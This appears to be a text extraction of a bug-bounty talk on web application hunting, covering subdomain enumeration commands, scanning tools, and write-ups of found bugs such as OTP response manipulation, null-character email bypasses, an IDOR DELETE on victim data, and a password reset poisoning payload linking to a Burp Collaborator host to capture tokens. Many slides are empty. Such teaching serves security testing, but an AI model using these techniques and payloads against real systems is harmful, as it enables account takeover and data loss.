1 of 48

Web Application Hunting Approach

2 of 48

Whoami�?�Name : Souvik Roy�CEH Certified

​

Full Time: Student /Learner

​

​

Part Time: Bug-Hunter

​

3 of 48

Outline

  • Finding & Choosing Targets
  • Enumeration
  • Scanning
  • Analyse
  • Attack

​

​

4 of 48

Finding & Choosing Targets

  • Choosing platforms

​

​

​

​

​

​

​

​

​

​

​

​

​

​

5 of 48

​

  • Searching For Company

​

    • Application Launch Date( Waybackurl )

​

​

​

​

​

    • Program Launch Date

​

​

​

​

​

​

​

​

​

​

​

​

6 of 48

  • Selecting Targets

​

​

​

Bounty Rewards Response Time

7 of 48

Enumeration

  • Subdomain Enum
    • Search Engine Dorks
    • Dnsdumpster.com

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

8 of 48

- Certificate Transparency(CT) project

​

​

​

​

9 of 48

- ASN Number enum

        • https://bgp.net/

​

​

        • Supply all asn number to censys tool , it will fetch all the subdomain
          • censys search  "autonomous_system.asn:AS45530”

​

10 of 48

- Enumeration using Tools

        • Sublistr3
          • python sublist3r.py -e google,yahoo,virustotal -d example.com
        • Amass
          • amass enum --passive -d example.com
        • Oneforall
          • Python oneforall.py –target example.com run 

​

​

​

​

11 of 48

  • Shortlist Subdomain

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

Tools

CT Project

ASN

Duplicates & Dead S-domains

Httpx & sort –u | uniq

Unique & Alive S-domains

12 of 48

  • Automation vs Manual

It is better to write a script that will automate all the enumeration - fetch all subdomain using tools

- fetch all subdomain from CT project

- fetch all ASN number and subdomains

- filter-out all the dups and alive s-domains

​

​

13 of 48

  • FDNS

project sonar that gather Internet wide scan data and make it available to researchers and the security community.

​

curl -silent https://scans.io/data/rapid7/sonar.fdns_v2/filename.json.gz | pigz -dc | grep “.domain.com” | jq

14 of 48

Scanning

    • Select a subdomain “home.domain.com”
    • Find the technology the website is using
      • Wapplyzer
      • Builtwith
      • Whatweb

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

15 of 48

    • Perform Port scan on the subdomain
      • Naabu
      • Rust Scan

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

16 of 48

    • Fetch all the urls from the website

​

​

​

​

    • Fetch all the JS file
      • Using subjs

​

​

​

​

​

​

​

      • Find links inside all the js file ( using linkfinder)

​

​

​

​

​

​

​

​

​

​

​

​

​

​

17 of 48

      • Find Secrete creds inside the js file (secretefinder tool)

​

​

​

​

​

​

      • Create wordlist using the endpoints inside the JS Files (getjswords.py)

​

​

​

​

​

​

    • Perform DIR Bruteforce

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

18 of 48

    • CMS Scan

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

19 of 48

Analyse

  • Be a good user
          • Open Burp suite
          • Add domain to scope
          • Start using the web-application
          • Use notion software to store req

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

20 of 48

  • Understand How the Logic works
          • What request are send out
          • What response do you get on valid request
          • What response do you get on In-valid request
          • Keep notes of all the request and response

​

​

  • Take a Break

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

21 of 48

Attack

  • Low Hanging Fruits
      • Easy to Find
      • No need Burpsuite
      • But you may get Duplicate

​

​

​

Bug Duplicate

​

​

​

​

​

​

​

​

​

​

​

​

22 of 48

  • Broken Links Hijacking
    • Every web app has social media link in footer
    • Open all the links and check , if the links show something like page not found or user not found
    • That means the link is broken and no social media account exist with that user name
    • Create a account using that user-name and the link will be hijacked

​

h

          • pa

no user found

​

​

​

​

user founded attacker

​

​

​

​

​

​

​

​

​

​

​

​

​

​

23 of 48

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

24 of 48

  • Subdomain Takeover
        • This happens when the subdomain has a canonical name (CNAME) in DNS,
        • But no host is providing content for it. 

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

25 of 48

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

26 of 48

  • Open Redirect

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

27 of 48

  • Session Expiration Issue
    • Login with the same account in two different browser.
    • Try to change password from one browser.
    • You need to check if both the account get logout or not
    • If the another account session doesn't expire.
    • Then there is a Session Expiration Issues

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

28 of 48

  • Business Logic Bugs
    • Registration Page

What operation does registration page do ?

1. Take input from user

2. Make sure that , email or username doesn't exist

3. Then it perform verification

          • Verification By OTP/ Token

4. It will perform INSERT operation

​

​

​

​

​

​

​

​

​

​

​

​

​

29 of 48

  • Unauthorized Group Membership Addition Bug

a. This web application provide feature to create groups.

​

b. The user who want to add member has to provide the username of the people to whom he/she wants to add .

c. It will send email to those username , and if user click on that link , he/she will be added to that .

​

I was able to add my account to any of the existing groups

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

30 of 48

    • During registration , If I add any existing Group number then it showed “Group Already Exist”

​

    • So , I added %09 null character and The request was successful

​

​

​

​

​

​

​

​

​

​

​

​

​

​

31 of 48

  • OTP Bypass (Response Manipulation)

a. This web application verify user using OTP.

​

b. The OTP is send in a phone number.

c. Put the wrong OTP and intercept the response

d. Edit the response and make it {“success”:true} & Forward it

​

​

​

​

​

​

​

​

​

​

​

​

​

​

32 of 48

    • The request

​

​

​

    • The Response

​

​

​

    • Edit the Response

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

33 of 48

  • SQL Injection in API call
        • The application was call api , during envelopes/cart
        • Each envelopes has Unique ID

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

34 of 48

        • So, I forwarded request by putting a single quote &

​

​

​

        • And I got a SQL Error

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

35 of 48

  • Premium Feature Access
        • The application was providing 2 types of account Premium and Normal
        • The bug lies, in the Update Detail process
        • So in this bug , attacker was able to use premium feature of the application , by using victims premium account
        • The email updating , doesn't have any verification steps
        • I can update my mail to any account , But the mail-ID cant be an existing user of the application.

​

        • For example , I can update my mail from my1@mail.com to any mail-ID.
        • But I cannot add a mail she@mail.com because it has already account

​

​

​

​

​

​

​

​

​

​

​

​

​

​

36 of 48

        • So, I added the victims premium account mail, ending with null character %00 or %09

​

​

​

​

​

        • Just Logout and Log-In again
        • The victim mail was added to my account & I was able to access the premium features

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

37 of 48

  • Privilege Escalation Through IDOR
      • The application was mail sending web-app , that provide feature to send mail.
      • All the mails were stored in the envelopes. The envelopes contain all the info , like the files , the text receiver address etc.
      • So when you try to open your inbox it send a request a get request. With the envelop ID

​

​

​

​

​

​

​

​

​

​

​

​

​

38 of 48

        • So, I changed the envelop ID to victims ID, to fetch their information.

​

​

​

​

​

        • And I got a Error Response

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

39 of 48

        • Http method allowed

​

​

​

​

        • The response showed DELETE method is allowed

​

​

​

        • I Fired the delete request, on victim envelop ID

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

40 of 48

        • I was able to delete the victim envelop

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

41 of 48

  • Rate Limit
      • So when you fill up the details and press enter button
      • This request will send verification mail and redirect me to the enter OTP page.

​

​

​

      • So I send this to intruder and send the request for 10 times , after that it showed up “ Max Limit ”
      • There was re-send button in Enter OTP page

​

​

​

​

​

​

​

​

​

​

​

42 of 48

      • I intercept the request and It showed a different endpoint

​

​

​

​

      • So I again send this to intruder and send the request for unlimited times and Inbox was flooded with the email

​

​

​

​

​

​

​

​

​

​

​

43 of 48

  • Password Reset Poisoing
      • The bug was founded in password reset page
      • The password reset request looks like

​

​

​

​

      • So I tried multiple parameter pollution like two email parameter or using a list of emails . It failed.

​

      • The payload which worked was a pipe |

​

​

​

​

​

​

​

​

​

​

44 of 48

      • Sending a request , using pipe will send a token which looks like
      • The request

​

​

​

​

      • So I tried inject html code and to redirect the code to my burp collaborator link

email=victimsmail@yahoo.com|"/><a href="http://mc29f04J4p0qlm.burpcollaborator.net?do=sendToken

      • The request send a email to victim

​

​

​

​

​

​

​

​

​

​

45 of 48

      • The victim will get a mail, which will has a button with a url

​

<a href="http://mc29f0dp4apo1hcbk2xvzm5dt2. burpcollaborator.net?do=sendToken&token=A5Dds4JERBbh sd0511...> Click Here </a>

​

      • On clicking the URL it will send the token to the burp (Attacker)

​

      • Using the token , account password can rest

​

​

​

​

​

​

​

​

​

​

​

​

​

46 of 48

  • Some List of bugs in password reset

​

    • Token in response
        • Whenever a request is generated for sending password reset token
        • Do intercept the response
        • It may contain OTP or Token

​

    • Token Doesn't Expire
        • Send a request for password reset.
        • Check if the token expire or not , once it is used.

​

​

​

​

​

​

​

​

​

​

​

47 of 48

    • Host Header Injections

​

    • Old Email Token Doesn't Expire
        • Send a Password reset request
        • You will receive token , but don’t use it
        • Now Login to the account and change your email-address
        • Now Try to reset password using the old email password reset token

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

48 of 48

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​

​